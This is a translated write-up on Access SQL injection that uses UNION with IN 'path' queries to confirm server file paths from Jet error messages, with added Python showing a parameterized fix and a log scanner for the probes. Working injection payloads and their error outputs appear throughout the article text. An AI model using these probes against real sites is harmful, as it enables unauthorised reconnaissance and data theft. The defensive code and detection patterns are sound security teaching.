Text / Amanl
SQL injection is a hot topic these days, and many new injection methods are being dug up. Using system error messages to reveal file paths is also a popular subject, so today I will try my hand at it too.
This example applies to Access (MS SQL queries have no such path specification). Access has a feature that imports a table from a source database into a target database.
For example: mysource.mdb (admin table) -> myDestination.mdb
To create a new table in an existing external database, use the IN keyword. If the external database does not exist, or if the table already exists, the SELECT INTO statement returns an error message.
Select * INTO TBLNEWCUSTOMERS IN 'C:/CUSTOMERS.MDB' from TBLCUSTOMERS
Can this be applied as a subquery? Turn it into the following:
In general an injectable statement looks like select * from news where id=" & request("id"); the demonstration below uses select * from news where id=" & request("id") for testing. For convenience, the statements are written directly as the SQL that ends up being executed:
Select * from news where id = 3 and select * INTO TBLNEWCUSTOMERS IN 'C:/CUSTOMERS.MDB' from TBLCUSTOMERS
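The injection exists because the request value is concatenated straight into the SQL text. The following is an added example, not code from the original article: it reproduces the vulnerable concatenation in Python against a constructed in-memory SQLite table standing in for the Access news table, and places beside it a hardened version that accepts only a plain integer id and passes it as a bound parameter. The table contents, the admin table, the function names and the sample injected input are all assumptions for illustration.

```python
import re
import sqlite3


def make_news_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the article's Access tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    # secondary table of the kind the article's UNION probes reach for
    conn.execute("CREATE TABLE admin (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'root')")
    conn.commit()
    return conn


def build_query_unsafe(request_id: str) -> str:
    """The article's pattern: select * from news where id=" & request("id")."""
    return "SELECT id, title FROM news WHERE id = " + request_id


def fetch_news_unsafe(conn: sqlite3.Connection, request_id: str):
    # whatever the client sent becomes part of the SQL text
    return conn.execute(build_query_unsafe(request_id)).fetchall()


# Hardened form: the id parameter of the page is a number, so accept only digits.
ID_RE = re.compile(r"\d{1,9}")


def parse_news_id(request_id: str) -> int:
    value = request_id.strip()
    if not ID_RE.fullmatch(value):
        raise ValueError("news id must be a plain integer")
    return int(value)


def fetch_news_safe(conn: sqlite3.Connection, request_id: str):
    news_id = parse_news_id(request_id)
    # bound parameter: the value is never spliced into the statement
    return conn.execute("SELECT id, title FROM news WHERE id = ?",
                        (news_id,)).fetchall()


# Constructed injected value (a column-count-matched UNION, as in the article).
INJECTED = "3 UNION SELECT id, name FROM admin"

if __name__ == "__main__":
    db = make_news_db()
    print("unsafe:", fetch_news_unsafe(db, INJECTED))  # admin row leaks with news 3
    try:
        fetch_news_safe(db, INJECTED)
    except ValueError as err:
        print("safe:", err)  # request rejected before any SQL runs
```

Rejecting the value before it reaches the database engine also removes the error-message channel the rest of the article relies on: a request that fails validation never produces a Jet or ODBC provider error for the client to read.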
Testing shows that the import cannot be performed through a subquery; this road is blocked. Then I thought of UNION, the merge operator, and wondered whether it could be used.
Note: the UNION operator (applies to Access)
Although a UNION operation can also be regarded as a kind of merged query, it cannot be treated as a join; it is mentioned here because it can assemble one result set from several sources, which resembles some kinds of joins. UNION operations are generally used to combine data from tables, SELECT statements or queries, omitting any duplicate rows. All data sources must have the same number of fields, but those fields need not be of the same data type. Suppose we have an employees table with the same structure as the customers table, and we want to merge the two tables to get a list of names and email addresses:
SELECT [Last Name], [First Name], Email from Tblcustomers Union Select [Last Name], [First Name], Email from Tblemployees
A UNION operation does not display records that are duplicated across the two tables. The query after UNION must have the same number of columns as the query before UNION, for example:
Select ID, Title from news where id = 3 Union Select * from admin
If the column counts do not match, it returns:
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft] [ODBC Microsoft Access Driver] The number of columns in the two tables or queries selected in the union query does not match.
This can be avoided by rewriting the query as: Select ID, Title from news where id = 3 Union Select 1, 1 from admin. As long as the number of 1s equals the number of fields, the query still runs.
Now see whether the statement can be turned into:
Select * from news where id = 3 Union Select * INTO TBLNEWCUSTOMERS IN 'C:/CUSTOMERS.MDB' from TBLCUSTOMERS
Returns:
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft] [ODBC Microsoft Access Driver] An action query cannot be used as a row source.
Still a failure, because UNION is only suitable for queries; an action query cannot follow it. Perhaps this road does not work either, but I was unwilling to give up.
Try:
Select * from news where id = 3 Union Select * from admin.c
Returns:
Microsoft Jet Database Engine error '80004005' Could not find file 'c:/winnt/system32/admin.mdb'.
This proves that it works the same way as the path-probing test Select * from news where id = 3 and 0 <> (Select Count(*) from admin.c). But with this method Access always appends the .mdb suffix by default; even though that can be worked around, as above, it is too much trouble.
So I was thinking whether another method would be easier, and I remembered SELECT * INTO TBLNEWCUSTOMERS IN 'C:/CUSTOMERS.MDB' from TBLCUSTOMERS. Doesn't the IN keyword point to a path and file name? Can it be used the other way round?
Then test:
Select * from news where id = 3 Union Select * from admin in 'c:/customers.mdb'
System message:
Microsoft Jet Database Engine error '80004005' Could not find file 'c:/customers.mdb'.
Use:
Select * from news where id = 3 Union Select * from admin in 'c:/winnt/system32/cmd.exe'
System message:
Microsoft Jet Database Engine error '80004005' The Microsoft Jet Database Engine cannot open the file 'c:/winnt/system32/cmd.exe'. It is already opened by another user, or you have no permission to view its data.
This method is more concise than probing with And 0 <> (Select Count(*) from admin), and the .mdb suffix is no longer appended: when the guessed path and file name are correct, the message is shown as above. But if you guess a non-MDB file:
Execute:
Select * from news where id = 3 Union Select * from admin in 'E:/www/include/connect.asp'
Returns:
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft] [ODBC Microsoft Access Driver] Unrecognized database format 'E:/www/include/connect.asp'.
This proves that the guessed path and file name are correct.
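Each of the three probe responses above is a different Jet error text leaking back to the client, and each probe leaves a distinctive query string in the web server log. As an added example that is not part of the original article, the following Python scans constructed IIS-style log lines (date, time, method, URI stem, URI query, status) for the two probe shapes the article uses, the UNION ... IN 'path' form and the And 0 <> (Select Count(*) from ...) form, and extracts the path or table being probed. The log format, the line contents and the function names are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines: date time cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2004-05-01 10:00:01 GET /news.asp id=3 200
2004-05-01 10:00:07 GET /news.asp id=3+union+select+*+from+admin+in+'c:/customers.mdb' 500
2004-05-01 10:00:12 GET /news.asp id=3+and+0<>(select+count(*)+from+admin.c) 500
2004-05-01 10:00:20 GET /news.asp id=3+union+select+*+from+admin+in+'e:/www/include/connect.asp' 500
2004-05-01 10:00:25 GET /news.asp id=12 200
"""

# Probe shapes taken from the article: UNION ... FROM table IN 'path' and the
# older And 0 <> (Select Count(*) from database.table) path test.
UNION_IN_RE = re.compile(
    r"union\s+select\b.*?\bfrom\s+\w+\s+in\s+'([^']+)'", re.IGNORECASE | re.DOTALL)
COUNT_SUBQUERY_RE = re.compile(
    r"and\s+0\s*<>\s*\(\s*select\s+count\(\*\)\s+from\s+([\w.]+)\s*\)", re.IGNORECASE)


def parse_line(line: str):
    """Split one log line into fields; the query string is URL-decoded."""
    parts = line.split()
    if len(parts) != 6:
        return None
    date, time, method, stem, query, status = parts
    return {"time": f"{date} {time}", "method": method, "stem": stem,
            "query": unquote_plus(query), "status": int(status)}


def classify(query: str):
    """Return (kind, probed target) if the decoded query matches a probe shape."""
    m = UNION_IN_RE.search(query)
    if m:
        return "union_in_path", m.group(1)
    m = COUNT_SUBQUERY_RE.search(query)
    if m:
        return "count_subquery", m.group(1)
    return None


def find_path_probes(log_text: str):
    """Collect every request that looks like a Jet path probe."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec["query"])
        if verdict is not None:
            kind, target = verdict
            hits.append({"time": rec["time"], "stem": rec["stem"], "kind": kind,
                         "target": target, "status": rec["status"]})
    return hits


if __name__ == "__main__":
    for hit in find_path_probes(SAMPLE_LOG):
        print(f"{hit['time']} {hit['stem']} {hit['kind']} -> {hit['target']} ({hit['status']})")
```

A run of 500 responses on one page whose query strings decode to UNION or COUNT(*) probes is the signature to alert on; the same records show which paths were tested. Alongside detection, the response side of the leak is closed by not returning the provider's raw error text to the browser (a generic error page in place of the Jet message), since every probe in the article reads its answer from that text.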